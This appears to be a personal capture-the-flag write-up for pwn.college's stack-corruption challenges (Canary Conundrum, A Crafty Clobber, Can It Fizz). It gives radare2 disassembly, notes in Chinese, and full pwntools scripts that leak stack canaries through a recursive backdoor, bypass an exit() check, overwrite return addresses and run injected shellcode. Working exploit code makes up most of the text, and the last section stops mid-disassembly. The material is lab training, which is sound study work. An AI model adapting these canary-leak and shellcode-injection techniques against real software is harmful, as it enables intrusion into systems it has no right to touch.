PwnCollege - Program Security - Complex Corruption

Canary Conundrum (Easy)

hacker@program-security~canary-conundrum-easy:~$ /challenge/canary-conundrum-easy
NX bit is disabled

We have disabled the following standard memory corruption mitigations for this challenge:
- the stack is executable. This means that if the stack contains shellcode
and you overwrite the return address with the address of that shellcode, it will execute.

Payload size: 1
# ...
Send your payload (up to 1 bytes)!
1
You sent 1 bytes!
# ...
The program's memory status:
- the input buffer starts at 0x7ffda7bc3890
- the saved frame pointer (of main) is at 0x7ffda7bc3920
- the saved return address (previously to main) is at 0x7ffda7bc3928
- the saved return address is now pointing to 0x570e55560bfd.
- the canary is stored at 0x7ffda7bc3918.
- the canary value is now 0x4991921470004300.

You said: 1
# backdoor triggers a recursive challenge() call with the same canary

Offsets: buf -> canary = 136, buf -> ret = 152

hacker@program-security~canary-conundrum-easy:~$ r2 -A -q -c "pdf @ sym.challenge" /challenge/canary-conundrum-easy
┌ 1296: sym.challenge (char **arg1, char **arg2, int64_t arg3);
# ...
│           0x00001935      488b9560ff..   mov rdx, qword [nbyte]      ; size_t nbyte
│           0x0000193c      488b8568ff..   mov rax, qword [buf]
│           0x00001943      4889c6         mov rsi, rax                ; void *buf
│           0x00001946      bf00000000     mov edi, 0                  ; int fildes
│           0x0000194b      e8f0f7ffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
# read syscall buffer overflow
# ...
│           0x00001991      89c6           mov esi, eax
│           0x00001993      488d3d5a0c..   lea rdi, str.You_sent__d_bytes__n ; 0x25f4 ; "You sent %d bytes!\n" ; const char *format
│           0x0000199a      b800000000     mov eax, 0
│           0x0000199f      e88cf7ffff     call sym.imp.printf         ; int printf(const char *format)
# ...
│           0x00001a7d      bf0a000000     mov edi, 0xa                ; int c
│           0x00001a82      e869f6ffff     call sym.imp.putchar        ; int putchar(int c)
│           0x00001a87      488b8568ff..   mov rax, qword [buf]
│           0x00001a8e      4889c6         mov rsi, rax
│           0x00001a91      488d3dc70c..   lea rdi, str.You_said:__s_n ; 0x275f ; "You said: %s\n" ; const char *format
│           0x00001a98      b800000000     mov eax, 0
│           0x00001a9d      e88ef6ffff     call sym.imp.printf         ; int printf(const char *format)
│           0x00001aa2      488d3dc70c..   lea rdi, str.This_challenge_has_a_trick_hidden_in_its_code._Reverse_engineer_the_binary_right_after_this_puts__ ; 0x2770 ; "This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()" ; const char *s
│           0x00001aa9      e862f6ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001aae      488d3d230d..   lea rdi, str.call_to_see_the_hidden_backdoor_ ; 0x27d8 ; "call to see the hidden backdoor!" ; const char *s
│           0x00001ab5      e856f6ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001aba      488b8568ff..   mov rax, qword [buf]
# REPEAT syscall strstr
│           0x00001ac1      488d35310d..   lea rsi, str.REPEAT         ; 0x27f9 ; "REPEAT" ; const char *s2
│           0x00001ac8      4889c7         mov rdi, rax                ; const char *s1
│           0x00001acb      e8c0f6ffff     call sym.imp.strstr         ; char *strstr(const char *s1, const char *s2)
│           0x00001ad0      4885c0         test rax, rax
│       ┌─< 0x00001ad3      742c           je 0x1b01
│       │   0x00001ad5      488d3d240d..   lea rdi, str.Backdoor_triggered__Repeating_challenge__ ; 0x2800 ; "Backdoor triggered! Repeating challenge()" ; const char *s
│       │   0x00001adc      e82ff6ffff     call sym.imp.puts           ; int puts(const char *s)
│       │   0x00001ae1      488b9538ff..   mov rdx, qword [var_c8h]    ; int64_t arg3
│       │   0x00001ae8      488b8d40ff..   mov rcx, qword [var_c0h]
│       │   0x00001aef      8b854cffffff   mov eax, dword [var_b4h]
│       │   0x00001af5      4889ce         mov rsi, rcx                ; int64_t arg2
│       │   0x00001af8      89c7           mov edi, eax                ; int64_t arg1
# recursive call have same canary
│       │   0x00001afa      e819fbffff     call sym.challenge
│      ┌──< 0x00001aff      eb11           jmp 0x1b12
│      ││   ; CODE XREF from sym.challenge @ 0x1ad3(x)
│      │└─> 0x00001b01      488d3d220d..   lea rdi, str.Goodbye_       ; 0x282a ; "Goodbye!" ; const char *s
│      │    0x00001b08      e803f6ffff     call sym.imp.puts           ; int puts(const char *s)
│      │    0x00001b0d      b800000000     mov eax, 0
│      │    ; CODE XREF from sym.challenge @ 0x1aff(x)
│      └──> 0x00001b12      488b4df8       mov rcx, qword [canary]
│           0x00001b16      6448330c25..   xor rcx, qword fs:[0x28]
│       ┌─< 0x00001b1f      7405           je 0x1b26
│       │   0x00001b21      e8faf5ffff     call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
│       │   ; CODE XREF from sym.challenge @ 0x1b1f(x)
│       └─> 0x00001b26      c9             leave
└           0x00001b27      c3             ret

#!/usr/bin/env python3
import re
from pwn import *

context.arch = "amd64"
context.log_level = "info"

def exploit():
    p = process("/challenge/canary-conundrum-easy")

    # === Phase 1 ===
    p.sendlineafter(b"Payload size:", b"6")
    p.sendafter(b"!\n", b"REPEAT")

    out1 = p.recvuntil(b"You said:").decode()
    buf1 = int(re.search(r"buffer starts at (0x[0-9a-f]+)", out1).group(1), 16)
    canary = int(re.search(r"canary value is now (0x[0-9a-f]+)", out1).group(1), 16)

    log.info(f"[*] 全局 Canary: {hex(canary)}")
    log.info(f"[*] 第一层栈基址 (Buf1): {hex(buf1)}")

    # === Phase 2: 计算偏移 ===
    p.sendlineafter(b"Payload size:", b"6")
    p.sendafter(b"!\n", b"REPEAT")

    out2 = p.recvuntil(b"You said:").decode()
    buf2 = int(re.search(r"buffer starts at (0x[0-9a-f]+)", out2).group(1), 16)

    # 栈是向下生长的，计算栈帧大小
    frame_size = buf1 - buf2
    log.info(f"[*] 栈帧偏移 (Frame Size): {hex(frame_size)}")

    # 预测第三次递归
    buf3 = buf2 - frame_size
    log.info(f"[*] 第三层栈基址 (Buf3): {hex(buf3)}")

    # === Phase 3: Payload ===
    shellcode = asm(shellcraft.cat("/flag"))

    # 152 bytes (buf to ret) + 8 bytes (RIP overwrite)
    payload_len = 160
    p.sendlineafter(b"Payload size:", str(payload_len).encode())

    payload = shellcode
    payload = payload.ljust(136, b"\x90")  # 填充至 Canary
    payload += p64(canary)                 # 注入正确的 Canary (绕过检测)
    payload += b"B" * 8                    # 填充 Dummy RBP
    payload += p64(buf3)                   # 覆盖返回地址到 Shellcode

    p.sendafter(b"!\n", payload)
    p.interactive()

if __name__ == "__main__":
    exploit()
# pwn.college{******************************************}

Canary Conundrum (Hard)

hacker@program-security~canary-conundrum-hard:~$ /challenge/canary-conundrum-hard
###
### Welcome to /challenge/canary-conundrum-hard!
###

Payload size: 1
Send your payload (up to 1 bytes)!
1
You said: 1
Goodbye!
### Goodbye!

# buf = rbp - 0x70
            0x000018d8      488d4590       lea rax, [rbp - 0x70]
            0x000018dc      48894588       mov qword [rbp - 0x78], rax
            0x000018e0      48c7458000..   mov qword [rbp - 0x80], 0
            0x000018e8      488d3d1907..   lea rdi, str.Payload_size:    ; 0x2008 ; "Payload size: "
            0x000018ef      b800000000     mov eax, 0
            0x000018f4      e837f8ffff     call sym.imp.printf         ;[1]
            0x000018f9      488d4580       lea rax, [rbp - 0x80]
            0x000018fd      4889c6         mov rsi, rax
            0x00001900      488d3d1007..   lea rdi, [0x00002017]       ; "%lu"
            0x00001907      b800000000     mov eax, 0
            0x0000190c      e84ff8ffff     call sym.imp.__isoc99_scanf ;[2]
            0x00001911      488b4580       mov rax, qword [rbp - 0x80]
            0x00001915      4889c6         mov rsi, rax
            0x00001918      488d3d0107..   lea rdi, str.Send_your_payload__up_to__lu_bytes___n    ; 0x2020 ; "Send your payload (up to %lu bytes)!\n"
            0x0000191f      b800000000     mov eax, 0
            0x00001924      e807f8ffff     call sym.imp.printf         ;[1]
            0x00001929      488b5580       mov rdx, qword [rbp - 0x80]
            0x0000192d      488b4588       mov rax, qword [rbp - 0x78]
            0x00001931      4889c6         mov rsi, rax
            0x00001934      bf00000000     mov edi, 0
            0x00001939      e802f8ffff     call sym.imp.read           ;[3]
            0x0000193e      89857cffffff   mov dword [rbp - 0x84], eax
            0x00001944      83bd7cffff..   cmp dword [rbp - 0x84], 0
        ┌─< 0x0000194b      792c           jns 0x1979
        │   0x0000194d      e8aef7ffff     call sym.imp.__errno_location ;[4]
        │   0x00001952      8b00           mov eax, dword [rax]
        │   0x00001954      89c7           mov edi, eax
        │   0x00001956      e825f8ffff     call sym.imp.strerror       ;[5]
        │   0x0000195b      4889c6         mov rsi, rax
        │   0x0000195e      488d3de306..   lea rdi, str.ERROR:_Failed_to_read_input_____s__n    ; 0x2048 ; "ERROR: Failed to read input -- %s!\n"
        │   0x00001965      b800000000     mov eax, 0
        │   0x0000196a      e8c1f7ffff     call sym.imp.printf         ;[1]
        │   0x0000196f      bf01000000     mov edi, 1
        │   0x00001974      e8f7f7ffff     call sym.imp.exit           ;[6]
        └─> 0x00001979      488b4588       mov rax, qword [rbp - 0x78]
            0x0000197d      4889c6         mov rsi, rax
            0x00001980      488d3de506..   lea rdi, str.You_said:__s_n    ; 0x206c ; "You said: %s\n"
            0x00001987      b800000000     mov eax, 0
            0x0000198c      e89ff7ffff     call sym.imp.printf         ;[1]
            0x00001991      488b4588       mov rax, qword [rbp - 0x78]
            0x00001995      488d35de06..   lea rsi, str.REPEAT         ; 0x207a ; "REPEAT"
            0x0000199c      4889c7         mov rdi, rax
# backdoor
            0x0000199f      e8ecf7ffff     call sym.imp.strstr         ;[7]
            0x000019a4      4885c0         test rax, rax
        ┌─< 0x000019a7      742c           je 0x19d5
        │   0x000019a9      488d3dd806..   lea rdi, str.Backdoor_triggered__Repeating_challenge__    ; 0x2088 ; "Backdoor triggered! Repeating challenge()"
        │   0x000019b0      e85bf7ffff     call sym.imp.puts           ;[8]
        │   0x000019b5      488b9558ff..   mov rdx, qword [rbp - 0xa8]
        │   0x000019bc      488b8d60ff..   mov rcx, qword [rbp - 0xa0]
        │   0x000019c3      8b856cffffff   mov eax, dword [rbp - 0x94]
        │   0x000019c9      4889ce         mov rsi, rcx
        │   0x000019cc      89c7           mov edi, eax
        │   0x000019ce      e86efeffff     call 0x1841                 ;[9]
       ┌──< 0x000019d3      eb11           jmp 0x19e6
       │└─> 0x000019d5      488d3dd606..   lea rdi, str.Goodbye_       ; 0x20b2 ; "Goodbye!"
       │    0x000019dc      e82ff7ffff     call sym.imp.puts           ;[?]
       │    0x000019e1      b800000000     mov eax, 0
       └──> 0x000019e6      488b4df8       mov rcx, qword [rbp - 8]
            0x000019ea      6448330c25..   xor rcx, qword fs:[0x28]
        ┌─< 0x000019f3      7405           je 0x19fa
        │   0x000019f5      e826f7ffff     call sym.imp.__stack_chk_fail ;[?]
        └─> 0x000019fa      c9             leave
            0x000019fb      c3             ret
            ;-- main:
            0x000019fc      f30f1efa       endbr64
            0x00001a00      55             push rbp
            0x00001a01      4889e5         mov rbp, rsp
            0x00001a04      4881ec0010..   sub rsp, segment.LOAD1
            0x00001a0b      48830c2400     or qword [rsp], 0
            0x00001a10      4883ec30       sub rsp, 0x30
            0x00001a14      89bdecefffff   mov dword [rbp - 0x1014], edi
            0x00001a1a      4889b5e0ef..   mov qword [rbp - section..plt], rsi
            0x00001a21      488995d8ef..   mov qword [rbp - 0x1028], rdx
            0x00001a28      64488b0425..   mov rax, qword fs:[0x28]
            0x00001a31      488945f8       mov qword [rbp - 8], rax
            0x00001a35      31c0           xor eax, eax
            0x00001a37      488b05e225..   mov rax, qword [obj.stdin]    ; [0x4020:8]=0
            0x00001a3e      b900000000     mov ecx, 0
            0x00001a43      ba02000000     mov edx, 2
# read() with user-controlled size (buffer overflow point)
            0x00001929      488b5580       mov rdx, qword [rbp - 0x80]
            0x0000192d      488b4588       mov rax, qword [rbp - 0x78]
            0x0000192d      488b4588       mov rax, qword [rbp - 0x78]
            0x00001931      4889c6         mov rsi, rax
            0x00001934      bf00000000     mov edi, 0
            0x00001939      e802f8ffff     call sym.imp.read           ;[3]

#!/usr/bin/env python3
from pwn import *

context.arch = "amd64"
context.log_level = "info"

# buf -> canary
offset = 104


def exploit():
    p = process("/challenge/canary-conundrum-hard")
    # ==========================================
    # Phase 1: 探测 Canary
    # ==========================================
    p.sendlineafter(b"Payload size: ", str(offset + 1).encode())
    payload1 = b"REPEAT".ljust(offset, b"A") + b"X"
    p.sendafter(b"!\n", payload1)

    p.recvuntil(b"You said: ")
    p.recv(offset + 1)
    leak = p.recv(7)

    canary = u64(b"\x00" + leak)

    # ==========================================
    # Phase 2: 提取 Saved RBP
    # ==========================================
    p.sendlineafter(b"Payload size: ", str(offset + 9).encode())
    payload2 = b"REPEAT".ljust(offset, b"A") + b"Z" + p64(canary)[1:8] + b"Y"
    p.sendafter(b"!\n", payload2)

    p.recvuntil(b"You said: ")
    p.recv(offset + 9)

    raw_leak = p.recvuntil(b"\n", drop=True)

    # 只截取属于指针的 5 个有效字节，防止栈上的垃圾数据导致解包崩溃
    rbp_leak = raw_leak[:5]
    rbp = u64((b"\x00" + rbp_leak).ljust(8, b"\x00"))

    # Canary 校验只发生在函数即将返回（执行 leave; ret 指令之前）的那一刻。
    # 只要程序还在这个循环里处理你的 REPEAT 请求，它就没有执行到函数结尾，也就不会去检查 Canary

    # ==========================================
    # Phase 3: 完美精确的内存分配
    # ==========================================
    shellcode = asm(shellcraft.cat("/flag"))

    # 必须加上 len(shellcode)，否则内核会残酷地将其截断！
    payload3_size = offset + 24 + 1000 + len(shellcode)
    p.sendlineafter(b"Payload size: ", str(payload3_size).encode())

    # 构造 Payload：抵达 Canary -> 填充 Dummy -> 覆写 RIP -> 部署 NOP 滑橇 -> Shellcode
    payload3 = b"A" * offset
    payload3 += p64(canary)
    payload3 += b"B" * 8
    payload3 += p64(rbp)
    payload3 += b"\x90" * 1000
    payload3 += shellcode

    p.sendafter(b"!\n", payload3)

    result = p.recvall(timeout=1)
    if b"pwn.college{" in result or b"flag{" in result:
        print(result.decode().strip())
        return


if __name__ == "__main__":
    exploit()

hacker@program-security~canary-conundrum-hard:~$ python a.py
[+] Starting local process '/challenge/canary-conundrum-hard': pid 193
[+] Receiving all data: Done (181B)
[*] Process '/challenge/canary-conundrum-hard' stopped with exit code -11 (SIGSEGV) (pid 193)
You said: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Goodbye!
pwn.college{******************************************}

A Crafty Clobber (Easy)

Write a full exploit involving injecting shellcode, and a method of tricking the challenge into executing your payload.

hacker@program-security~a-crafty-clobber-easy:~$ /challenge/crafty-clobber-easy
# ...
We have disabled the following standard memory corruption mitigations for this challenge:
- the stack is executable. This means that if the stack contains shellcode
and you overwrite the return address with the address of that shellcode, it will execute.

Payload size: 1
You have chosen to send 1 bytes of input!
This will allow you to write from 0x7ffeab149990 (the start of the input buffer)
right up to (but not including) 0x7ffeab149991 (which is -101 bytes beyond the end of the buffer).
Send your payload (up to 1 bytes)!
1
You sent 1 bytes!

The program's memory status:
- the input buffer starts at 0x7ffeab149990
- the saved frame pointer (of main) is at 0x7ffeab149a10
- the saved return address (previously to main) is at 0x7ffeab149a18
- the saved return address is now pointing to 0x5e1d9f1c9849.
- the canary is stored at 0x7ffeab149a08.
- the canary value is now 0x3fe4e8b1513acc00.

buf to canary -> 120

You said: 1

This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()
call to see the hidden backdoor!

This challenge will, by default, exit() instead of returning from the
challenge function. When a process exit()s, it ceases to exist immediately,
and no amount of overwritten return addresses will let you hijack its control
flow. You will have to reverse engineer the program to understand how to avoid
making this challenge exit(), and allow it to return normally.
exit() condition triggered. Exiting!

hacker@program-security~a-crafty-clobber-easy:~$ r2 -A -q -c "pdf @ sym.challenge" /challenge/crafty-clobber-easy
┌ 1299: sym.challenge (char **arg1, char **arg2, int64_t arg3);
│ `- args(rdi, rsi, rdx) vars(9:sp[0x10..0xc0])
# canary
│           0x00002284      64488b0425..   mov rax, qword fs:[0x28]
│           0x0000228d      488945f8       mov qword [canary], rax
│           0x00002291      31c0           xor eax, eax
│           0x00002293      488d5580       lea rdx, [s]
│           0x00002297      b800000000     mov eax, 0
│           0x0000229c      b90e000000     mov ecx, 0xe
│           0x000022a1      4889d7         mov rdi, rdx
│           0x000022a4      f348ab         rep stosq qword [rdi], rax
│           0x000022a7      488d4580       lea rax, [s]
│           0x000022ab      48898578ff..   mov qword [buf], rax
│           0x000022b2      48c78570ff..   mov qword [nbyte], 0
│           0x00002692      488b8578ff..   mov rax, qword [buf]
# backdoor
│           0x00002699      488d355911..   lea rsi, str.REPEAT         ; 0x37f9 ; "REPEAT" ; const char *s2
│           0x000026a0      4889c7         mov rdi, rax                ; const char *s1
│           0x000026a3      e8e8eaffff     call sym.imp.strstr         ; char *strstr(const char *s1, const char *s2)
│           0x000026a8      4885c0         test rax, rax
│       ┌─< 0x000026ab      742f           je 0x26dc
│       │   0x000026ad      488d3d4c11..   lea rdi, str.Backdoor_triggered__Repeating_challenge__ ; 0x3800 ; "Backdoor triggered! Repeating challenge()" ; const char *s
│       │   0x000026b4      e857eaffff     call sym.imp.puts           ; int puts(const char *s)
│       │   0x000026b9      488b9548ff..   mov rdx, qword [var_b8h]    ; int64_t arg3
│       │   0x000026c0      488b8d50ff..   mov rcx, qword [var_b0h]
│       │   0x000026c7      8b855cffffff   mov eax, dword [var_a4h]
│       │   0x000026cd      4889ce         mov rsi, rcx                ; int64_t arg2
│       │   0x000026d0      89c7           mov edi, eax                ; int64_t arg1
│       │   0x000026d2      e88afbffff     call sym.challenge
│      ┌──< 0x000026d7      e982000000     jmp 0x275e
│      ││   ; CODE XREF from sym.challenge @ 0x26ab(x)
│      │└─> 0x000026dc      488d3d4711..   lea rdi, str.Goodbye_       ; 0x382a ; "Goodbye!" ; const char *s
│      │    0x000026e3      e828eaffff     call sym.imp.puts           ; int puts(const char *s)
# ...
# Check exit() condition
# if use exit() to exit the challenge, we can't get the return address, so we have to make the challenge return normally
│      │    0x00002724      488b45e8       mov rax, qword [var_18h]
│      │    0x00002728      48ba8b5979..   movabs rdx, 0x855cc253c479598b
│      │    0x00002732      4839d0         cmp rax, rdx
│      │┌─< 0x00002735      7416           je 0x274d
│      ││   0x00002737      488d3d7212..   lea rdi, str.exit___condition_triggered._Exiting_ ; 0x39b0 ; "exit() condition triggered. Exiting!" ; const char *s
│      ││   0x0000273e      e8cde9ffff     call sym.imp.puts           ; int puts(const char *s)
│      ││   0x00002743      bf2a000000     mov edi, 0x2a               ; '*' ; int status
│      ││   0x00002748      e823eaffff     call sym.imp.exit           ; void exit(int status)
│      ││   ; CODE XREF from sym.challenge @ 0x2735(x)
│      │└─> 0x0000274d      488d3d8412..   lea rdi, str.exit___condition_avoided__Continuing_execution. ; 0x39d8 ; "exit() condition avoided! Continuing execution." ; const char *s
│      │    0x00002754      e8b7e9ffff     call sym.imp.puts           ; int puts(const char *s)
│      │    0x00002759      b800000000     mov eax, 0
│      │    ; CODE XREF from sym.challenge @ 0x26d7(x)
│      └──> 0x0000275e      488b4df8       mov rcx, qword [canary]
│           0x00002762      6448330c25..   xor rcx, qword fs:[0x28]
│       ┌─< 0x0000276b      7405           je 0x2772
│       │   0x0000276d      e8aee9ffff     call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
│       │   ; CODE XREF from sym.challenge @ 0x276b(x)
│       └─> 0x00002772      c9             leave
└           0x00002773      c3             ret

Payload 结构必须是这样：

[104 字节] 的垃圾填充数据（比如 b"A" * 104），这正好填满 buf 到 var_18h 之间的空隙。

[8 字节] value：p64(0x855cc253c479598b)，覆盖 [var_18h]，绕过 exit()。

[8 字节] 的垃圾填充数据（0x18 - 0x8 = 0x10，也就是 16 字节距离，减去刚刚写入的 8 字节魔法值，还需要 8 字节），用来走到 Canary 面前。

[8 字节] 的 Canary：原封不动地写回去，防止触发 __stack_chk_fail。

[8 字节] 的 Saved RBP：随便填，或者填入题干给你的 saved frame pointer。

[8 字节] 的 Saved RIP：填入题干给你的 input buffer starts at 的地址。

[N 字节] 的 Shellcode（既然题目说栈是可执行的，直接把 Shellcode 放在开头或者紧接着 RIP 后面跳过去执行就行）。

#!/usr/bin/env python3
from pwn import *

context.arch = "amd64"
context.log_level = "info"

# buf -> canary
offset1 = 104

check = p64(0x855CC253C479598B)

offset2 = 8

buf_to_canary = offset1 + len(check) + offset2


def exploit():
    p = process("/challenge/crafty-clobber-easy")
    # ==========================================
    # Phase 1: 探测 Canary
    # ==========================================
    p.sendlineafter(b"Payload size: ", str(buf_to_canary + 1).encode())
    payload1 = b"REPEAT".ljust(offset1, b"A") + check + b"A" * offset2 + b"X"
    p.sendafter(b"!\n", payload1)

    p.recvuntil(b"You said: ")
    p.recv(buf_to_canary + 1)
    leak = p.recv(7)

    canary = u64(b"\x00" + leak)

    # ==========================================
    # Phase 2: 提取 Saved RBP
    # ==========================================
    p.sendlineafter(b"Payload size: ", str(buf_to_canary + 9).encode())
    payload2 = b"REPEAT".ljust(offset1, b"A") + check + b"A" * offset2 + b"Z" + p64(canary)[1:8] + b"Y"
    p.sendafter(b"!\n", payload2)

    p.recvuntil(b"You said: ")
    p.recv(buf_to_canary + 9)

    raw_leak = p.recvuntil(b"\n", drop=True)

    # 只截取属于指针的 5 个有效字节，防止栈上的垃圾数据导致解包崩溃
    rbp_leak = raw_leak[:5]
    rbp = u64((b"\x00" + rbp_leak).ljust(8, b"\x00"))

    # ==========================================
    # Phase 3: 完美精确的内存分配
    # ==========================================
    shellcode = asm(shellcraft.cat("/flag"))

    # 必须加上 len(shellcode)，否则内核会残酷地将其截断！
    payload3_size = buf_to_canary + 24 + 1000 + len(shellcode)
    p.sendlineafter(b"Payload size: ", str(payload3_size).encode())

    # 构造 Payload：抵达 Canary -> 填充 Dummy -> 覆写 RIP -> 部署 NOP 滑橇 -> Shellcode
    payload3 = b"A" * offset1 + check + b"A" * offset2
    payload3 += p64(canary)
    payload3 += b"B" * 8
    payload3 += p64(rbp)
    payload3 += b"\x90" * 1000
    payload3 += shellcode

    p.sendafter(b"!\n", payload3)

    result = p.recvall(timeout=1)
    if b"pwn.college{" in result:
        print(result)
        return


if __name__ == "__main__":
    exploit()

pwn.college{*******************************************}

A Crafty Clobber (Hard)

# buf -> rbp - 0x60
     0x00001b1b      488d45a0       lea rax, [rbp - 0x60]
     0x00001b1f      48894598       mov qword [rbp - 0x68], rax
     0x00001b23      48c7459000..   mov qword [rbp - 0x70], 0
     0x00001b2b      488d3dd604..   lea rdi, str.Payload_size:    ; 0x2008 ; "Payload size: "
     0x00001b32      b800000000     mov eax, 0
     0x00001b37      e8f4f5ffff     call sym.imp.printf         ;[1]
     0x00001b3c      488d4590       lea rax, [rbp - 0x70]
     0x00001b40      4889c6         mov rsi, rax
     0x00001b43      488d3dcd04..   lea rdi, [0x00002017]       ; "%lu"
     0x00001b4a      b800000000     mov eax, 0
     0x00001b4f      e80cf6ffff     call sym.imp.__isoc99_scanf ;[2]
     0x00001b54      488b4590       mov rax, qword [rbp - 0x70]
     0x00001b58      4889c6         mov rsi, rax
     0x00001b5b      488d3dbe04..   lea rdi, str.Send_your_payload__up_to__lu_bytes___n    ; 0x2020 ; "Send your payload (up to %lu bytes)!
     0x00001b62      b800000000     mov eax, 0
     0x00001b67      e8c4f5ffff     call sym.imp.printf         ;[1]
     0x00001b6c      488b5590       mov rdx, qword [rbp - 0x70]
     0x00001b70      488b4598       mov rax, qword [rbp - 0x68]
     0x00001b74      4889c6         mov rsi, rax
     0x00001b77      bf00000000     mov edi, 0
     0x00001b7c      e8bff5ffff     call sym.imp.read           ;[3]
# ...
# check -> rbp - 0x10
# check value -> 0xd355efb4bf7a0170
│    0x00001c1e      488b45f0       mov rax, qword [rbp - 0x10]
│    0x00001c22      48ba70017a..   movabs rdx, 0xd355efb4bf7a0170
│    0x00001c2c      4839d0         cmp rax, rdx
│┌─< 0x00001c2f      7416           je 0x1c47

#!/usr/bin/env python3
from pwn import *

context.arch = "amd64"
context.log_level = "info"

# buf -> canary
offset1 = 80

check = p64(0xd355efb4bf7a0170)

offset2 = 0

buf_to_canary = 88


def exploit():
    p = process("/challenge/crafty-clobber-hard")
    # ==========================================
    # Phase 1: 探测 Canary
    # ==========================================
    p.sendlineafter(b"Payload size: ", str(buf_to_canary + 1).encode())
    payload1 = b"REPEAT".ljust(offset1, b"A") + check + b"A" * offset2 + b"X"
    p.sendafter(b"!\n", payload1)

    p.recvuntil(b"You said: ")
    p.recv(buf_to_canary + 1)
    leak = p.recv(7)

    canary = u64(b"\x00" + leak)

    # ==========================================
    # Phase 2: 提取 Saved RBP
    # ==========================================
    p.sendlineafter(b"Payload size: ", str(buf_to_canary + 9).encode())
    payload2 = b"REPEAT".ljust(offset1, b"A") + check + b"A" * offset2 + b"Z" + p64(canary)[1:8] + b"Y"
    p.sendafter(b"!\n", payload2)

    p.recvuntil(b"You said: ")
    p.recv(buf_to_canary + 9)

    raw_leak = p.recvuntil(b"\n", drop=True)

    # 只截取属于指针的 5 个有效字节，防止栈上的垃圾数据导致解包崩溃
    rbp_leak = raw_leak[:5]
    rbp = u64((b"\x00" + rbp_leak).ljust(8, b"\x00"))

    # ==========================================
    # Phase 3: 完美精确的内存分配
    # ==========================================
    shellcode = asm(shellcraft.cat("/flag"))

    # 必须加上 len(shellcode)，否则内核会残酷地将其截断！
    payload3_size = buf_to_canary + 24 + 1000 + len(shellcode)
    p.sendlineafter(b"Payload size: ", str(payload3_size).encode())

    # 构造 Payload：抵达 Canary -> 填充 Dummy -> 覆写 RIP -> 部署 NOP 滑橇 -> Shellcode
    payload3 = b"A" * offset1 + check + b"A" * offset2
    payload3 += p64(canary)
    payload3 += b"B" * 8
    payload3 += p64(rbp)
    payload3 += b"\x90" * 1000
    payload3 += shellcode

    p.sendafter(b"!\n", payload3)

    result = p.recvall(timeout=1)
    if b"pwn.college{" in result:
        print(result)
        return


if __name__ == "__main__":
    exploit()

pwn.college{******************************************}

Can It Fizz?

Exploit the binary to obtain the flag!

hacker@program-security~can-it-fizz:~$ checksec /challenge/can-it-fizz
[*] '/challenge/can-it-fizz'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found #####
    NX:         NX unknown - GNU_STACK missing #####
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

hacker@program-security~can-it-fizz:~$ r2 -A -q -c "pdf @ sym.challenge" /challenge/can-it-fizz
┌ 466: sym.challenge (char **arg1, char **arg2, int64_t arg3);
│           0x000011e9      f30f1efa       endbr64
│           0x000011ed      55             push rbp
│           0x000011ee      4889e5         mov rbp, rsp
│           0x000011f1      4883c480       add rsp, 0xffffffffffffff80 # same to sub rsp, 0x80
│           0x000011f5      897d9c         mov dword [var_64h], edi    ; arg1
│           0x000011f8      48897590       mov qword [var_70h], rsi    ; arg2
│           0x000011fc      48895588       mov qword [var_78h], rdx    ; arg3
# buf -> rbp - 0x60
│           0x00001200      488d55a0       lea rdx, [buf]
│           0x00001204      b800000000     mov eax, 0
│           0x00001209      b90c000000     mov ecx, 0xc
│           0x0000120e      4889d7         mov rdi, rdx
│           0x00001211      f348ab         rep stosq qword [rdi], rax
│           0x00001214      488d45a0       lea rax, [buf]
│           0x00001218      4883c004       add rax, 4
# dest -> buf + 4
│           0x0000121c      488945f8       mov qword [dest], rax
│           0x00001220      488d45a0       lea rax, [buf]
│           0x00001224      4883c014       add rax, 0x14
# src -> buf + 0x14
│           0x00001228      488945f0       mov qword [src], rax
│           0x0000122c      c745ec0000..   mov dword [var_14h], 0
│           0x00001233      c745a01000..   mov dword [buf], 0x10
│           0x0000123a      488d45a0       lea rax, [buf]
│           0x0000123e      4883c044       add rax, 0x44
# 'Buzz' in buf + 0x44
│           0x00001242      c70042757a7a   mov dword [rax], 0x7a7a7542 ; 'Buzz'
│                                                                      ; [0x7a7a7542:4]=-1
│           0x00001248      66c740040a00   mov word [rax + 4], 0xa
│           0x0000124e      488d3daf0d..   lea rdi, str.Welcome_to_Fizz_Buzz_ ; 0x2004 ; "Welcome to Fizz Buzz!" ; const char *s
│           0x00001255      e866feffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000125a      c745ec0000..   mov dword [var_14h], 0
│       ┌─< 0x00001261      e944010000     jmp 0x13aa
│       │   ; CODE XREF from sym.challenge @ 0x13b2(x)
│      ┌──> 0x00001266      8b55ec         mov edx, dword [var_14h]
│      ╎│   0x00001269      4863c2         movsxd rax, edx
│      ╎│   0x0000126c      4869c08988..   imul rax, rax, 0xffffffff88888889
│      ╎│   0x00001273      48c1e820       shr rax, 0x20
│      ╎│   0x00001277      01d0           add eax, edx
│      ╎│   0x00001279      c1f803         sar eax, 3
│      ╎│   0x0000127c      89c1           mov ecx, eax
│      ╎│   0x0000127e      89d0           mov eax, edx
│      ╎│   0x00001280      c1f81f         sar eax, 0x1f
│      ╎│   0x00001283      29c1           sub ecx, eax
│      ╎│   0x00001285      89c8           mov eax, ecx
│      ╎│   0x00001287      89c1           mov ecx, eax
│      ╎│   0x00001289      c1e104         shl ecx, 4
│      ╎│   0x0000128c      29c1           sub ecx, eax
│      ╎│   0x0000128e      89d0           mov eax, edx
│      ╎│   0x00001290      29c8           sub eax, ecx
│      ╎│   0x00001292      85c0           test eax, eax
│     ┌───< 0x00001294      7510           jne 0x12a6
│     │╎│   0x00001296      488d057b2d..   lea rax, obj.fuzzbuzz       ; 0x4018 ; "FizzBuzz\n"
│     │╎│   0x0000129d      488945f0       mov qword [src], rax
│    ┌────< 0x000012a1      e980000000     jmp 0x1326
